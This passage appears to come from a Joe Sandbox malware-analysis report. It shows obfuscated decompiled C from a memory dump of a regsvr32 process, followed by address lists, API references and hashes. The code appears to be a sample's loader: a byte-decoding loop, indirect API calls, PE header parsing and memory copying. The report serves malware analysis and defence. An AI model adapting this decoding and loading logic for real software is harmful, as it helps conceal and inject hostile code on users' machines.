						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) & 0x00000000;
						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) | _t567 & 0x00000000 | _t421;
						_t567 = _v12;
					}
				}
				_pop( *_t243);
				_t514 = _t512 & 0x00000000 ^ _v20;
				if( *(_t493 + 0x4359ed) == 0) {
					_t421 =  *((intOrPtr*)(_t493 + 0x44105c))(_t514);
					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) & 0x00000000;
					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) | _t660 & 0x00000000 | _t421;
					_t660 = _t660;
					_t514 =  *_t672;
					_t672 =  &(_t672[1]);
				}
				_t587 =  *_t672;
				_t673 =  &(_t672[1]);
				if( *(_t493 + 0x4351b7) == 0) {
					_t421 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4352a0)), _t514);
					_v16 = _t514;
					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) & 0x00000000;
					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) | _t514 - _v16 | _t421;
					_pop( *_t261);
					_t514 = _v16;
				}
				_v12 = _t421;
				_t629 = _t627 & 0x00000000 | _t421 ^ _v12 | _t587;
				_push(_t493);
				do {
					_t425 =  *_t629 & 0x000000ff;
					_t629 = _t629 + 1;
					if(_t425 == 0) {
						goto L64;
					}
					_push(_t514);
					 *_t673 = 1;
					_t515 = _t629;
					 *_t266 = _t629;
					_push(_v20);
					_pop(_t567);
					_v8 = 8;
					do {
						asm("rol eax, cl");
						_t495 = _t425;
						_t425 = _t567;
						asm("ror ebx, cl");
						_t269 =  &_v8;
						 *_t269 = _v8 - 1;
					} while ( *_t269 != 0);
					 *_t673 = _t515;
					_t425 = _t495;
					 *_t271 = 0;
					_t514 = 0 ^ _v12;
					L64:
					asm("stosb");
					_t514 = _t514 - 1;
				} while (_t514 != 0);
				_pop( *_t273);
				_t497 = 0 ^ _v12;
				if( *((intOrPtr*)(_t497 + 0x4354f9)) == 0) {
					_t425 =  *((intOrPtr*)(_t497 + 0x4410a8))( *((intOrPtr*)(_t497 + 0x43541a)),  *((intOrPtr*)(_t497 + 0x4351cf)));
					 *_t279 = _t425;
					_push(_v12);
					_pop( *_t281);
				}
				if( *(_t497 + 0x435122) == 0) {
					_t283 = _t497 + 0x435182; // 0x435182
					if( *(_t497 + 0x4357e2) == 0) {
						_t446 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x435671)));
						_v12 = _t587;
						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) & 0x00000000;
						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) ^ _t587 - _v12 ^ _t446;
						_t587 = _v12;
					}
					_t425 =  *((intOrPtr*)(_t497 + 0x441064))();
					_v20 = _t567;
					 *(_t497 + 0x435122) = _t425;
					_t567 = _v20;
					if( *(_t497 + 0x4354ca) == 0) {
						_t425 =  *((intOrPtr*)(_t497 + 0x44105c))();
						 *_t673 = _t660;
						 *(_t497 + 0x4354ca) = _t425;
						_t660 = 0;
					}
				}
				if(_a4 != 0) {
					if( *(_t497 + 0x435250) == 0) {
						_t303 = _t497 + 0x4358c0; // 0x4358c0
						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t303);
						 *_t673 = _t629;
						 *(_t497 + 0x435250) = 0 ^ _t425;
						_t629 = 0;
					}
					if(_a8 != 0) {
						if( *(_t497 + 0x435213) == 0) {
							_t443 =  *((intOrPtr*)(_t497 + 0x441060))();
							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) & 0x00000000;
							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) | _t587 -  *_t673 ^ _t443;
							_t587 = _t587;
						}
						_t425 = E001A1C5D(_t497, _t514, _t567, _t629, _a8, _a4);
					}
				}
				_pop( *_t315);
				_t568 = _v20;
				if( *(_t497 + 0x4352f3) == 0) {
					_t425 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x43531f)), _t568);
					_push(_t514);
					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) & 0x00000000;
					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) ^ (_t514 -  *_t673 | _t425);
					_t568 =  *_t673;
					_t673 = _t673 - 0xfffffffc;
				}
				if(_t568 > 0) {
					if( *(_t497 + 0x4354b6) == 0) {
						_t425 =  *((intOrPtr*)(_t497 + 0x4410a0))( *((intOrPtr*)(_t497 + 0x435088)),  *((intOrPtr*)(_t497 + 0x435412)),  *((intOrPtr*)(_t497 + 0x4355a1)), 0xd,  *((intOrPtr*)(_t497 + 0x43577e)),  *((intOrPtr*)(_t497 + 0x435298)), 0x400);
						_v12 = _t587;
						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) & 0x00000000;
						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) ^ (_t587 - _v12 | _t425);
					}
					_push(_a4);
					_pop( *_t339);
					_push(_v16);
					_pop(_t590);
					_push(_t590);
					 *_t673 = _t629;
					_t520 =  *(_t590 + 4);
					_t634 = 0;
					if( *(_t497 + 0x4350bc) == 0) {
						_t343 = _t497 + 0x4355b5; // 0x4355b5
						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t343, _t520);
						_push(0);
						 *_t673 = _t660;
						 *(_t497 + 0x4350bc) = 0 ^ _t425;
						_t520 =  *_t673;
						_t673 =  &(_t673[1]);
					}
					_v16 = _t497;
					_t427 = _t425 & 0x00000000 ^ _t497 & 0x00000000 ^  *(_t590 + 8);
					_t500 = _v16;
					if( *(_t500 + 0x435659) == 0) {
						_t441 =  *((intOrPtr*)(_t500 + 0x441060))();
						_v12 = _t590;
						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) & 0x00000000;
						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) ^ _t590 & 0x00000000 ^ _t441;
						_t590 = _v12;
						 *_t357 = _t520;
						_t520 = _t520 & 0x00000000 ^ _v12;
						 *_t359 = _t427;
						_t427 = _v16;
					}
					_push(_t520);
					_push(_t520);
					_v16 = _t634;
					_t570 = _t568 & 0x00000000 | _t634 ^ _v16 ^ _t427;
					_t637 = _v16;
					if( *(_t500 + 0x4353fa) == 0) {
						_t365 = _t500 + 0x43595c; // 0x43595c
						_t440 =  *((intOrPtr*)(_t500 + 0x44106c))(_t365, _t570);
						_v16 = _t590;
						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) & 0x00000000;
						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) ^ (_t590 ^ _v16 | _t440);
						_t590 = _v16;
						_t570 = (_t570 & 0x00000000) +  *_t673;
						_t673 = _t673 - 0xfffffffc;
					}
					_v16 = _t520;
					_t639 = _t637 & 0x00000000 ^ _t520 - _v16 ^ _a8;
					_push( *_t673);
					 *_t673 =  *_t673 - _t570;
					_pop(_t525);
					if( *(_t500 + 0x435984) == 0) {
						_t379 = _t500 + 0x435829; // 0x435829
						_t438 =  *((intOrPtr*)(_t500 + 0x441064))(_t570, _t525);
						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) & 0x00000000;
						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) | _t590 & 0x00000000 | _t438;
						_t590 = _t590;
						_t570 =  *_t673;
						_t673 = _t673 - 0xfffffffc;
						 *_t385 = _t379;
						_t525 = _t525 & 0x00000000 | _v12;
					}
					_t640 = _t639 + _t525;
					_t527 = _t525 & 0x00000000 ^ (_t500 -  *_t673 |  *(_t590 + 8));
					_t503 = _t500;
					if( *(_t503 + 0x43579a) == 0) {
						_t389 = _t503 + 0x4359c1; // 0x4359c1
						_t436 =  *((intOrPtr*)(_t503 + 0x441064))(_t527);
						_v16 = _t527;
						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) & 0x00000000;
						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) ^ (_t527 & 0x00000000 | _t436);
						 *_t397 = _t389;
						_t570 = _t570 & 0x00000000 | _v12;
						 *_t399 = _t570;
						_t527 = _v20;
					}
					memcpy(_t590, _t640, _t527);
					_t676 =  &(_t673[3]);
					_t592 = _t640 + _t527 + _t527;
					_push(_a8);
					_pop( *_t402);
					_push(_v20);
					_pop(_t641);
					if( *(_t503 + 0x4352b7) == 0) {
						_t405 = _t503 + 0x435237; // 0x435237
						_t434 =  *((intOrPtr*)(_t503 + 0x441068))(_t405, _t570);
						_v20 = _t641;
						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) & 0x00000000;
						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) ^ _t641 & 0x00000000 ^ _t434;
						_t641 = _v20;
						_t570 =  *_t676;
						_t676 = _t676 - 0xfffffffc;
					}
					_t677 = _t676 - 0xfffffffc;
					_push(0 ^  *_t676);
					 *_t677 =  *_t677 - _t570;
					_pop(_t531);
					_t429 = memcpy(_t592, _t641, _t531);
					_t678 = _t677 + 0xc;
					 *_t414 = _t429;
					_t629 =  *_t678;
					_t425 = memcpy(_t641 + _t531 + _t531 & 0x00000000 | _t429 ^  *_t678 | _a8, _t629, 0);
					_t673 =  &(_t678[4]);
					_t587 = _t629 + (0 | _v12) + (0 | _v12);
				}
				return _t425;
			}

0x001a3726
0x001a3726
0x001a3726
0x001a3726
0x001a3726
0x001a3733
0x001a373b
0x001a3743
0x001a3746
0x001a3749
0x001a3749
0x001a374f
0x001a375c
0x001a3766
0x001a376e
0x001a3775
0x001a377b
0x001a377e
0x001a3781
0x001a3781
0x001a3784
0x001a3785
0x001a3792
0x001a3795
0x001a379b
0x001a37a3
0x001a37aa
0x001a37b0
0x001a37b5
0x001a37b8
0x001a37b8
0x001a37c3
0x001a37c6
0x001a37c9
0x001a37d6
0x001a37e5
0x001a37e8
0x001a37eb
0x001a37eb
0x001a37f1
0x001a37f9
0x001a37fb
0x001a3808
0x001a3818
0x001a381b
0x001a381e
0x001a382a
0x001a382d
0x001a382d
0x001a3838
0x001a383b
0x001a383e
0x001a383e
0x001a3844
0x001a384c
0x001a385a
0x001a3866
0x001a386d
0x001a3873
0x001a3873
0x001a3874
0x001a3877
0x001a387a
0x001a387d
0x001a3885
0x001a3895
0x001a389b
0x001a38a3
0x001a38aa
0x001a38b3
0x001a38c0
0x001a38c9
0x001a38d5
0x001a38dc
0x001a38e2
0x001a38e5
0x001a38e8
0x001a38e8
0x001a38f1
0x001a38f8
0x001a38fe
0x001a38fe
0x001a38ff
0x001a3907
0x001a3909
0x001a3913
0x001a391c
0x001a3928
0x001a392f
0x001a3935
0x001a3935
0x001a393d
0x001a394a
0x001a394c
0x001a3952
0x001a395a
0x001a3961
0x001a3967
0x001a3967
0x001a396a
0x001a3970
0x001a3978
0x001a397f
0x001a398f
0x001a39bd
0x001a39c0
0x001a39c3
0x001a39c3
0x001a398f
0x001a39c9
0x001a39d3
0x001a39dc
0x001a39e2
0x001a39ea
0x001a39f1
0x001a39f7
0x001a39f7
0x001a39fa
0x001a3a02
0x001a3a06
0x001a3a0e
0x001a3a15
0x001a3a1b
0x001a3a1b
0x001a3a23
0x001a3a2c
0x001a3a30
0x001a3a3c
0x001a3a43
0x001a3a49
0x001a3a49
0x001a3a4c
0x001a3a59
0x001a3a81
0x001a3a84
0x001a3a87
0x001a3a8f
0x001a3a92
0x001a3a92
0x001a3a96
0x001a3a99
0x001a3a9c
0x001a3a9c
0x001a3aa8
0x001a3aab
0x001a3ab8
0x001a3aba
0x001a3abb
0x001a3ac3
0x001a3acd
0x001a3ad3
0x001a3adb
0x001a3ae2
0x001a3af1
0x001a3af4
0x001a3af4
0x001a3af7
0x001a3b00
0x001a3b06
0x001a3b0e
0x001a3b17
0x001a3b1d
0x001a3b25
0x001a3b2c
0x001a3b32
0x001a3b32
0x001a3b35
0x001a3b3b
0x001a3b44
0x001a3b4d
0x001a3b55
0x001a3b5c
0x001a3b62
0x001a3b62
0x001a3b63
0x001a3b70
0x001a3b7a
0x001a3b86
0x001a3b8d
0x001a3b93
0x001a3b93
0x001a3b94
0x001a3b96
0x001a3ba3
0x001a3bb1
0x001a3bb7
0x001a3bbf
0x001a3bc6
0x001a3bcc
0x001a3bcc
0x001a3bdb
0x001a3be8
0x001a3bf2
0x001a3bfe
0x001a3c05
0x001a3c0b
0x001a3c0c
0x001a3c0f
0x001a3c0f
0x001a3c18
0x001a3c1f
0x001a3c25
0x001a3c2c
0x001a3c2f
0x001a3c2f
0x001a3c32
0x001a3c32
0x001a3c33
0x001a3c33
0x001a3c44
0x001a3c50
0x001a3c57
0x001a3c5d
0x001a3c65
0x001a3c6d
0x001a3c75
0x001a3c7e
0x001a3c8a
0x001a3c91
0x001a3c97
0x001a3c97
0x001a3c98
0x001a3c9e
0x001a3ca4
0x001a3cab
0x001a3cb9
0x001a3cc2
0x001a3cc8
0x001a3cd0
0x001a3cd7
0x001a3cdd
0x001a3cdd
0x001a3cb9
0x001a3ce6
0x001a3ce9
0x001a3cf3
0x001a3cf6
0x001a3d02
0x001a3d09
0x001a3d0f
0x001a3d12
0x001a3d15
0x001a3d15
0x001a3d1a
0x001a3d1d
0x001a3d27
0x001a3d30
0x001a3d36
0x001a3d3e
0x001a3d45
0x001a3d50
0x001a3d53
0x001a3d53
0x001a3d56
0x001a3d61
0x001a3d66
0x001a3d67
0x001a3d67
0x001a3d6a
0x001a3d6d
0x00000000
0x00000000
0x001a3d6f
0x001a3d71
0x001a3d78
0x001a3d7f
0x001a3d82
0x001a3d85
0x001a3d86
0x001a3d8d
0x001a3d8d
0x001a3d8f
0x001a3d91
0x001a3d93
0x001a3d95
0x001a3d95
0x001a3d95
0x001a3d9c
0x001a3da3
0x001a3da8
0x001a3dab
0x001a3dae
0x001a3dae
0x001a3daf
0x001a3daf
0x001a3db4
0x001a3db7
0x001a3dc1
0x001a3dcf
0x001a3dd6
0x001a3dd9
0x001a3ddc
0x001a3ddc
0x001a3de9
0x001a3deb
0x001a3df9
0x001a3e01
0x001a3e07
0x001a3e0f
0x001a3e16
0x001a3e1c
0x001a3e1c
0x001a3e1f
0x001a3e25
0x001a3e2c
0x001a3e32
0x001a3e3c
0x001a3e3e
0x001a3e46
0x001a3e4d
0x001a3e53
0x001a3e53
0x001a3e3c
0x001a3e58
0x001a3e61
0x001a3e63
0x001a3e6a
0x001a3e72
0x001a3e79
0x001a3e7f
0x001a3e7f
0x001a3e84
0x001a3e8d
0x001a3e8f
0x001a3e9b
0x001a3ea2
0x001a3ea8
0x001a3ea8
0x001a3eaf
0x001a3eaf
0x001a3e84
0x001a3eb4
0x001a3eb7
0x001a3ec1
0x001a3eca
0x001a3ed0
0x001a3ed6
0x001a3edd
0x001a3eea
0x001a3eed
0x001a3eed
0x001a3ef3
0x001a3f00
0x001a3f27
0x001a3f2d
0x001a3f35
0x001a3f3c
0x001a3f42
0x001a3f45
0x001a3f48
0x001a3f4b
0x001a3f4e
0x001a3f4f
0x001a3f52
0x001a3f5a
0x001a3f5c
0x001a3f64
0x001a3f67
0x001a3f6e
0x001a3f74
0x001a3f76
0x001a3f7d
0x001a3f86
0x001a3f89
0x001a3f89
0x001a3f8c
0x001a3f98
0x001a3f9a
0x001a3fa4
0x001a3fa8
0x001a3fae
0x001a3fb6
0x001a3fbd
0x001a3fc3
0x001a3fcc
0x001a3fcf
0x001a3fd2
0x001a3fd5
0x001a3fd5
0x001a3fd8
0x001a3fd9
0x001a3fda
0x001a3fe5
0x001a3fe7
0x001a3ff1
0x001a3ff4
0x001a3ffb
0x001a4001
0x001a4009
0x001a4010
0x001a4016
0x001a401f
0x001a4022
0x001a4022
0x001a4025
0x001a4031
0x001a4039
0x001a403a
0x001a403d
0x001a4045
0x001a4049
0x001a4050
0x001a405c
0x001a4063
0x001a4069
0x001a406c
0x001a406f
0x001a4078
0x001a407b
0x001a407b
0x001a407e
0x001a408a
0x001a408c
0x001a4094
0x001a4098
0x001a409f
0x001a40a5
0x001a40ad
0x001a40b4
0x001a40c3
0x001a40c6
0x001a40cb
0x001a40ce
0x001a40ce
0x001a40d1
0x001a40d1
0x001a40d1
0x001a40d3
0x001a40d6
0x001a40d9
0x001a40dc
0x001a40e4
0x001a40e7
0x001a40ee
0x001a40f4
0x001a40fc
0x001a4103
0x001a4109
0x001a410e
0x001a4111
0x001a4111
0x001a4119
0x001a411c
0x001a411d
0x001a4120
0x001a4121
0x001a4121
0x001a4136
0x001a413e
0x001a4144
0x001a4144
0x001a4144
0x001a4144
0x001a415f

APIs

OleInitialize.OLE32(?,?,?,00000000,00000000), ref: 001A3811

Memory Dump Source

Source File: 0000000D.00000002.635169240.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1a0000_regsvr32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
Instruction ID: 1b7a3d79ee8654774c852d7b10d04e5d319d2e145cb1ce72ac68a1f3e3b38706
Opcode Fuzzy Hash: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
Instruction Fuzzy Hash: 63624D72800604EFFF049FA0C889B9A7BB5FF24325F0851A9ED5D9E09AD77415A4CF68

Uniqueness

Uniqueness Score: -1.00%

Function 001A242A, Relevance: 2.1, APIs: 1, Instructions: 592
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E001A242A(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4, char _a36, char _a244) {
				signed int _v8;
				signed int _v12;
				signed int _t337;
				signed int _t339;
				void* _t346;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t357;
				signed int _t358;
				signed int _t361;
				void* _t364;
				void* _t365;
				signed int _t366;
				signed int _t368;
				signed int _t371;
				signed int _t374;
				signed int _t377;
				signed int _t379;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				signed int _t388;
				signed int _t391;
				signed int _t392;
				signed int _t394;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed int _t404;
				signed int _t405;
				signed int _t408;
				signed int _t409;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t420;
				signed int _t423;
				signed int _t428;
				signed int _t431;
				signed int _t433;
				signed int _t454;
				signed int _t457;
				signed int _t479;
				signed int _t481;
				signed int _t484;
				void* _t486;
				signed int _t489;
				void* _t492;
				signed int _t500;
				signed int _t503;
				void* _t516;
				signed int _t523;
				signed int _t526;
				signed int _t529;
				void* _t531;
				signed int _t562;
				void* _t565;
				void* _t568;
				signed int* _t571;
				signed int* _t572;
				signed int* _t574;
				signed int* _t575;

				_t523 = __esi;
				_t479 = __edi;
				_t450 = __edx;
				_t426 = __ecx;
				_t417 = __ebx;
				if( *(__ebx + 0x4351c7) == 0) {
					_push(__ecx);
					_push(__edx);
					_push(__ebx + 0x4351ef);
					_t337 =  *((intOrPtr*)(__ebx + 0x44106c))();
					_v12 = __edx;
					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) & 0x00000000;
					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) | __edx ^ _v12 | _t337;
					_pop( *_t11);
					_t450 = _v12 & 0x00000000 ^ _v12;
					_pop( *_t13);
					_t426 = __ecx & 0x00000000 | _v12;
				}
				if( *(_t417 + 0x4352b0) == 0) {
					_push(_t426);
					_push(_t450);
					if( *(_t417 + 0x4355c5) == 0) {
						_t415 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x435914)));
						_v12 = _t523;
						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) & 0x00000000;
						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) | _t523 - _v12 | _t415;
						_t523 = _v12;
					}
					_t337 =  *((intOrPtr*)(_t417 + 0x441064))(_t417 + 0x4359f9);
					if( *(_t417 + 0x43523f) == 0) {
						_t413 =  *((intOrPtr*)(_t417 + 0x441060))(_t337);
						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) & 0x00000000;
						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) | _t479 -  *_t571 | _t413;
						_t479 = _t479;
						_t337 =  *_t571;
						_t571 =  &(_t571[1]);
					}
					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) & 0x00000000;
					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) | _t523 ^  *_t571 | _t337;
					_t523 = _t523;
					if( *(_t417 + 0x4351b3) == 0) {
						_t337 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x435978)),  *((intOrPtr*)(_t417 + 0x4356a9)));
						_push(_t426);
						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) & 0x00000000;
						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) ^ (_t426 & 0x00000000 | _t337);
					}
					_pop( *_t46);
					_t450 = _v12;
					_t426 =  *_t571;
					_t571 =  &(_t571[1]);
					if( *(_t417 + 0x4353c2) == 0) {
						_t337 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4352a8, _t450, _t426);
						_v12 = _t479;
						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) & 0x00000000;
						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) | _t479 - _v12 | _t337;
						_t479 = _v12;
						_t450 =  *_t571;
						_t575 =  &(_t571[1]);
						_t426 =  *_t575;
						_t571 = _t575 - 0xfffffffc;
					}
				}
				_push(_t450);
				_push(_t426);
				_t339 = _t337 & 0x00000000 ^ (_t523 ^  *_t571 | _a4);
				_t526 = _t523;
				if( *(_t417 + 0x43524c) == 0) {
					_t409 =  *((intOrPtr*)(_t417 + 0x44105c))();
					_v12 = _t450;
					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) & 0x00000000;
					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) ^ (_t450 & 0x00000000 | _t409);
					_t450 = _v12;
					 *_t67 = _t339;
					_t339 = 0 + _v12;
				}
				if( *(_t417 + 0x43539a) == 0) {
					_t404 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435020, _t417 + 0x435a31, _t339);
					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) & 0x00000000;
					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) ^ (_t479 & 0x00000000 | _t404);
					_t516 = _t479;
					_t405 =  *((intOrPtr*)(_t417 + 0x441060))();
					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) & 0x00000000;
					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) | _t516 -  *_t571 ^ _t405;
					_t479 = _t516;
					if( *(_t417 + 0x4355b1) == 0) {
						_t408 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x435068);
						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) & 0x00000000;
						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) ^ (_t426 ^  *_t571 | _t408);
						_t426 = _t426;
					}
					_t339 =  *_t571;
					_t571 = _t571 - 0xfffffffc;
				}
				 *_t93 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435669, _t417 + 0x4350e8, _t339 +  *((intOrPtr*)(_t339 + 0x3c)));
				_push(_v12);
				_pop( *_t95);
				_t572 = _t571 - 0xfffffffc;
				_push(0 ^  *_t571);
				_t346 = _t417 + 0x43517b;
				if( *(_t417 + 0x43525c) == 0) {
					_t400 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x4352d7)),  *((intOrPtr*)(_t417 + 0x43563d)), _t346);
					_v12 = _t450;
					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) & 0x00000000;
					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) ^ (_t450 - _v12 | _t400);
					_t450 = _v12;
					_t346 = (_t400 & 0x00000000) +  *_t572;
					_t572 = _t572 - 0xfffffffc;
				}
				_push(_t346);
				_t347 = _t417 + 0x435162;
				if( *(_t417 + 0x4357ee) == 0) {
					_t398 =  *((intOrPtr*)(_t417 + 0x441060))();
					_v12 = _t479;
					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) & 0x00000000;
					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) ^ _t479 - _v12 ^ _t398;
					_t479 = _v12;
					 *_t118 = _t347;
					_t347 = 0 + _v12;
				}
				_t348 =  *((intOrPtr*)(_t417 + 0x441044))();
				_v12 = _t526;
				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) & 0x00000000;
				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) | _t526 - _v12 ^ _t348;
				_t529 = _v12;
				 *_t128 = _t347;
				_t350 = 0 + _v12;
				if( *(_t417 + 0x4357de) == 0) {
					_t397 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4350d4, _t350);
					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) & 0x00000000;
					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) | _t450 -  *_t572 ^ _t397;
					_t450 = _t450;
					_pop( *_t137);
					_t350 = _v12;
				}
				_push(_t350);
				_v12 = _t450;
				_t481 = _t479 & 0x00000000 ^ (_t450 ^ _v12 | _t350);
				_t351 =  *(_t481 + 6) & 0x0000ffff;
				if( *(_t417 + 0x435579) == 0) {
					_t394 =  *((intOrPtr*)(_t417 + 0x4410a4))( *((intOrPtr*)(_t417 + 0x4352a4)), _t351);
					 *_t572 = _t529;
					 *(_t417 + 0x435579) = 0 ^ _t394;
					_t529 = 0;
					_t351 = 0 ^  *_t572;
					_t572 =  &(_t572[1]);
				}
				if( *((intOrPtr*)(_t417 + 0x435575)) == 0) {
					if( *(_t417 + 0x43534a) == 0) {
						_t392 =  *((intOrPtr*)(_t417 + 0x441060))(_t351);
						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) & 0x00000000;
						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) | _t529 -  *_t572 | _t392;
						_t529 = _t529;
						_t351 =  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					_push(_t351);
					_push(_t417 + 0x43573a);
					if( *(_t417 + 0x43580e) == 0) {
						_t391 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x43505c);
						_v12 = _t529;
						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) & 0x00000000;
						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) | _t529 & 0x00000000 | _t391;
						_t529 = _v12;
					}
					_t384 =  *((intOrPtr*)(_t417 + 0x441054))();
					if( *(_t417 + 0x435555) == 0) {
						_t388 =  *((intOrPtr*)(_t417 + 0x441060))(_t384);
						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) & 0x00000000;
						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) ^ _t426 ^  *_t572 ^ _t388;
						_t426 = _t426;
						_t384 = _t388 & 0x00000000 |  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					 *_t171 = _t384;
					_push(_v12);
					_pop( *_t173);
					if( *((intOrPtr*)(_t417 + 0x435716)) == 0) {
						 *_t177 =  *((intOrPtr*)(_t417 + 0x44106c))(_t417 + 0x4358e4);
						_push(_v12);
						_pop( *_t179);
					}
					_pop( *_t180);
					_t351 = 0 + _v12;
				}
				_v12 = _t481;
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ (_t481 ^ _v12 | _t351);
				_t484 = _v12;
				if( *(_t417 + 0x43577a) == 0) {
					_t351 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x4351e3)));
					 *_t572 = _t484;
					 *(_t417 + 0x43577a) = _t351;
					_t484 = 0;
				}
				_push(_t484);
				if( *(_t417 + 0x435008) == 0) {
					_t351 =  *((intOrPtr*)(_t417 + 0x441058))();
					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) & 0x00000000;
					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) | _t529 & 0x00000000 ^ _t351;
					_t529 = _t529;
				}
				 *_t572 = _t417;
				_t454 = 0 ^  *(_t484 + 0x54);
				_t420 = 0;
				_v12 = _t351;
				_t486 = _t484 & 0x00000000 ^ (_t351 - _v12 |  *(_t420 + 0x4350b0));
				if( *(_t420 + 0x435156) == 0) {
					_t205 = _t420 + 0x435900; // 0x435900
					_t382 =  *((intOrPtr*)(_t420 + 0x44106c))(_t205, _t454);
					_v12 = _t486;
					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) & 0x00000000;
					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) | _t486 ^ _v12 | _t382;
					_t486 = _v12;
					_t454 =  *_t572;
					_t572 =  &(_t572[1]);
				}
				_t531 = _t529 & 0x00000000 | _t420 & 0x00000000 ^ _a4;
				_t423 = _t420;
				_t428 = _t426 & 0x00000000 ^ (_t562 & 0x00000000 | _t454);
				_t565 = _t562;
				if(_t486 == _t531) {
					L50:
					_pop( *_t258);
					if( *(_t423 + 0x4354c6) == 0) {
						_t371 =  *((intOrPtr*)(_t423 + 0x441058))();
						_v12 = _t531;
						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) & 0x00000000;
						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) ^ _t531 ^ _v12 ^ _t371;
						_t531 = _v12;
					}
					_t489 =  &_a244;
					_t568 = _t565;
					do {
						_t431 = _t428;
						_v12 = _t423;
						_t433 = _t431 & 0x00000000 | _t423 & 0x00000000 ^  *(_t489 + 0x10);
						_t423 = _v12;
